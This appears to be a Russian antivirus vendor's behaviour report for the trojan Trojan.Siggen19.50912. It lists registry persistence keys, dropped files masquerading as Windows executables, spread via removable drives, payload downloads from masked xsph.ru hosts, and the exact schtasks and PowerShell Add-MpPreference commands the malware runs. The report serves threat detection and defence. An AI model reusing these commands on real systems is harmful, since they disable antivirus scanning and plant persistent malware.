Trojan.Siggen19.50912

Техническая информация

Для обеспечения автозапуска и распространения

Модифицирует следующие ключи реестра

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'spoolsv' = '"<Текущая директория>\spoolsv.exe"'
[<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'conhost' = '"%ProgramFiles(x86)%\Windows Photo Viewer\en-US\conhost.exe"'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'conhost' = '"%ProgramFiles(x86)%\Windows Photo Viewer\en-US\conhost.exe"'
[<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'WUDFHost' = '"<Текущая директория>\WUDFHost.exe"'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'WUDFHost' = '"<Текущая директория>\WUDFHost.exe"'
[<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'iexplore' = '"C:\Far2\Documentation\eng\iexplore.exe"'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'iexplore' = '"C:\Far2\Documentation\eng\iexplore.exe"'
[<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'mdm' = '"C:\Users\Default User\mdm.exe"'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'mdm' = '"C:\Users\Default User\mdm.exe"'
[<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'WUDFHost' = '"%HOMEPATH%\NetHood\WUDFHost.exe"'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'WUDFHost' = '"%HOMEPATH%\NetHood\WUDFHost.exe"'
[<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'firefox' = '"%ProgramFiles%\armorsurf\firefox.exe"'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'firefox' = '"%ProgramFiles%\armorsurf\firefox.exe"'
[<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'explorer' = '"<Текущая директория>\explorer.exe"'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'explorer' = '"<Текущая директория>\explorer.exe"'
[<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'conhost' = '"C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\conhost.exe"'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'conhost' = '"C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\conhost.exe"'
[<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'iexplore' = '"<Текущая директория>\iexplore.exe"'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'iexplore' = '"<Текущая директория>\iexplore.exe"'
[<HKLM>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe, "<Текущая директория>\spoolsv.exe", "%ProgramFiles(x86)%\Windows Media Player\Network Sharing\WUDFHost.ex...
[<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'WUDFHost' = '"%ProgramFiles(x86)%\Windows Media Player\Network Sharing\WUDFHost.exe"'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'WUDFHost' = '"%ProgramFiles(x86)%\Windows Media Player\Network Sharing\WUDFHost.exe"'
[<HKLM>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe, "<Текущая директория>\spoolsv.exe"'
[<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'spoolsv' = '"<Текущая директория>\spoolsv.exe"'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'winlogon' = '"%ProgramFiles(x86)%\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\winlogon.exe"'
[<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'winlogon' = '"%ProgramFiles(x86)%\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\winlogon.exe"'

Создает или изменяет следующие файлы

<SYSTEM32>\tasks\spoolsvs
<SYSTEM32>\tasks\spoolsv
<SYSTEM32>\tasks\wudfhostw
<SYSTEM32>\tasks\wudfhost
<SYSTEM32>\tasks\conhostc
<SYSTEM32>\tasks\iexplore
<SYSTEM32>\tasks\iexplorei
<SYSTEM32>\tasks\conhost
<SYSTEM32>\tasks\explorer
<SYSTEM32>\tasks\firefoxf
<SYSTEM32>\tasks\mdmm
<SYSTEM32>\tasks\explorere
<SYSTEM32>\tasks\firefox
<SYSTEM32>\tasks\mdm
<SYSTEM32>\tasks\winlogonw
<SYSTEM32>\tasks\winlogon

Создает следующие файлы на съемном носителе

<Имя диска съемного носителя>:\799a6791f1c0d38cafb78ec0a88cedf0.exe

Изменения в файловой системе

Создает следующие файлы

%ALLUSERSPROFILE%\file1.exe
%TEMP%\5rjh6rtfdo
%ProgramFiles(x86)%\reference assemblies\microsoft\framework\v3.5\redistlist\cc11b995f2a76d
%ProgramFiles(x86)%\reference assemblies\microsoft\framework\v3.5\redistlist\winlogon.exe
%ProgramFiles(x86)%\windows photo viewer\en-us\088424020bedd6
%ProgramFiles(x86)%\windows photo viewer\en-us\conhost.exe
<Текущая директория>\480b7989c529f6
<Текущая директория>\wudfhost.exe
C:\far2\documentation\eng\9db6e019d4f04e
C:\far2\documentation\eng\iexplore.exe
C:\users\default user\559fba5f8e4410
C:\users\default user\mdm.exe
%HOMEPATH%\nethood\480b7989c529f6
%HOMEPATH%\nethood\wudfhost.exe
%ProgramFiles%\armorsurf\0fc223bdacedc3
%ProgramFiles%\armorsurf\firefox.exe
<Текущая директория>\7a0fd90576e088
<Текущая директория>\explorer.exe
C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\088424020bedd6
C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\conhost.exe
<Текущая директория>\9db6e019d4f04e
<Текущая директория>\iexplore.exe
%ProgramFiles(x86)%\windows media player\network sharing\480b7989c529f6
%ProgramFiles(x86)%\windows media player\network sharing\wudfhost.exe
<Текущая директория>\f3b6ecef712a24
<Текущая директория>\spoolsv.exe
C:\bridgewin\vpdfi9lktfpeubd9cj.vbe
C:\bridgewin\containerruntime.exe
C:\bridgewin\kbrj5zb6pfgwil.bat
%ALLUSERSPROFILE%\file2.bat
%TEMP%\no7odqdizb.bat
nul

Присваивает атрибут 'скрытый' для следующих файлов

<Имя диска съемного носителя>:\799a6791f1c0d38cafb78ec0a88cedf0.exe

Удаляет следующие файлы

%ALLUSERSPROFILE%\file1.exe
%ALLUSERSPROFILE%\file2.bat
%TEMP%\5rjh6rtfdo

Сетевая активность

Подключается к

'a0####42.xsph.ru':80
'a0####96.xsph.ru':80

TCP

Запросы HTTP GET

http://a0####42.xsph.ru/file1.exe
http://a0####42.xsph.ru/file2.bat
http://a0####96.xsph.ru/UpdateApidbTrafficpublic.php?Ng##########################################################################################################################################...
http://a0####96.xsph.ru/UpdateApidbTrafficpublic.php?cr##########################################################################################################################################...

UDP

DNS ASK a0####42.xsph.ru
DNS ASK a0####96.xsph.ru
'localhost':123

Другое

Ищет следующие окна

ClassName: 'EDIT' WindowName: ''

Создает и запускает на исполнение

'%ALLUSERSPROFILE%\file1.exe'
'%WINDIR%\syswow64\wscript.exe' "C:\BridgeWin\vPDfI9lKtfPEUBD9cj.vbe"
'C:\bridgewin\containerruntime.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '<Текущая директория>\spoolsv.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath 'C:\BridgeWin\containerRuntime.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '<Текущая директория>\iexplore.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '<Текущая директория>\explorer.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\conhost.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%ProgramFiles%\armorsurf\firefox.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%HOMEPATH%\NetHood\WUDFHost.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath 'C:\Far2\Documentation\eng\iexplore.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '<Текущая директория>\WUDFHost.exe'
'<Текущая директория>\spoolsv.exe'
'%WINDIR%\syswow64\cmd.exe' /c ""C:\BridgeWin\kBRJ5zb6pFGWil.bat" "' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /C "%TEMP%\nO7OdQdiZB.bat"' (со скрытым окном)

Запускает на исполнение

'%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\file2.bat" "
'<SYSTEM32>\schtasks.exe' /create /tn "mdm" /sc ONLOGON /tr "'C:\Users\Default User\mdm.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "mdmm" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\mdm.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "iexplorei" /sc MINUTE /mo 7 /tr "'C:\Far2\Documentation\eng\iexplore.exe'" /f
'<SYSTEM32>\schtasks.exe' /create /tn "iexplore" /sc ONLOGON /tr "'C:\Far2\Documentation\eng\iexplore.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "iexplorei" /sc MINUTE /mo 7 /tr "'C:\Far2\Documentation\eng\iexplore.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "WUDFHostW" /sc MINUTE /mo 12 /tr "'<Текущая директория>\WUDFHost.exe'" /f
'<SYSTEM32>\schtasks.exe' /create /tn "WUDFHost" /sc ONLOGON /tr "'<Текущая директория>\WUDFHost.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "WUDFHostW" /sc MINUTE /mo 13 /tr "'<Текущая директория>\WUDFHost.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "iexplore" /sc ONLOGON /tr "'<Текущая директория>\iexplore.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'%ProgramFiles(x86)%\Windows Photo Viewer\en-US\conhost.exe'" /f
'<SYSTEM32>\schtasks.exe' /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'%ProgramFiles(x86)%\Windows Photo Viewer\en-US\conhost.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'%ProgramFiles(x86)%\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\winlogon.exe'" /f
'<SYSTEM32>\schtasks.exe' /create /tn "winlogon" /sc ONLOGON /tr "'%ProgramFiles(x86)%\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\winlogon.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'%ProgramFiles(x86)%\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\winlogon.exe'" /rl HIGHEST /f
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%ProgramFiles(x86)%\Windows Media Player\Network Sharing\WUDFHost.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\mdm.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%ProgramFiles(x86)%\Windows Photo Viewer\en-US\conhost.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%ProgramFiles(x86)%\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\winlogon.exe'
'<SYSTEM32>\schtasks.exe' /create /tn "WUDFHostW" /sc MINUTE /mo 5 /tr "'%HOMEPATH%\NetHood\WUDFHost.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "mdmm" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\mdm.exe'" /f
'<SYSTEM32>\schtasks.exe' /create /tn "WUDFHost" /sc ONLOGON /tr "'%HOMEPATH%\NetHood\WUDFHost.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "WUDFHostW" /sc MINUTE /mo 9 /tr "'%HOMEPATH%\NetHood\WUDFHost.exe'" /f
'<SYSTEM32>\schtasks.exe' /create /tn "firefoxf" /sc MINUTE /mo 8 /tr "'%ProgramFiles%\armorsurf\firefox.exe'" /rl HIGHEST /f
'%WINDIR%\syswow64\cmd.exe' /c bcdedit
'%WINDIR%\syswow64\cmd.exe' /c ""C:\BridgeWin\kBRJ5zb6pFGWil.bat" "
'<SYSTEM32>\schtasks.exe' /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'<Текущая директория>\spoolsv.exe'" /f
'<SYSTEM32>\schtasks.exe' /create /tn "spoolsv" /sc ONLOGON /tr "'<Текущая директория>\spoolsv.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'<Текущая директория>\spoolsv.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "WUDFHostW" /sc MINUTE /mo 9 /tr "'%ProgramFiles(x86)%\Windows Media Player\Network Sharing\WUDFHost.exe'" /f
'<SYSTEM32>\schtasks.exe' /create /tn "WUDFHost" /sc ONLOGON /tr "'%ProgramFiles(x86)%\Windows Media Player\Network Sharing\WUDFHost.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "WUDFHostW" /sc MINUTE /mo 6 /tr "'%ProgramFiles(x86)%\Windows Media Player\Network Sharing\WUDFHost.exe'" /rl HIGHEST /f
'<SYSTEM32>\cmd.exe' /C "%TEMP%\nO7OdQdiZB.bat"
'<SYSTEM32>\schtasks.exe' /create /tn "conhost" /sc ONLOGON /tr "'%ProgramFiles(x86)%\Windows Photo Viewer\en-US\conhost.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "iexplorei" /sc MINUTE /mo 12 /tr "'<Текущая директория>\iexplore.exe'" /f
'<SYSTEM32>\schtasks.exe' /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\conhost.exe'" /f
'<SYSTEM32>\schtasks.exe' /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\conhost.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\conhost.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "explorere" /sc MINUTE /mo 8 /tr "'<Текущая директория>\explorer.exe'" /f
'<SYSTEM32>\schtasks.exe' /create /tn "explorer" /sc ONLOGON /tr "'<Текущая директория>\explorer.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "explorere" /sc MINUTE /mo 9 /tr "'<Текущая директория>\explorer.exe'" /rl HIGHEST /f
'<SYSTEM32>\schtasks.exe' /create /tn "firefoxf" /sc MINUTE /mo 8 /tr "'%ProgramFiles%\armorsurf\firefox.exe'" /f
'<SYSTEM32>\schtasks.exe' /create /tn "firefox" /sc ONLOGON /tr "'%ProgramFiles%\armorsurf\firefox.exe'" /rl HIGHEST /f
'%WINDIR%\syswow64\chcp.com' 866
'<SYSTEM32>\schtasks.exe' /create /tn "iexplorei" /sc MINUTE /mo 12 /tr "'<Текущая директория>\iexplore.exe'" /rl HIGHEST /f
'<SYSTEM32>\w32tm.exe' /stripchart /computer:localhost /period:5 /dataonly /samples:2

Технологии

Термины

Обучение и просвещение

Мифы

Техническая информация

Рекомендации по лечению

Демо бесплатно на 14 дней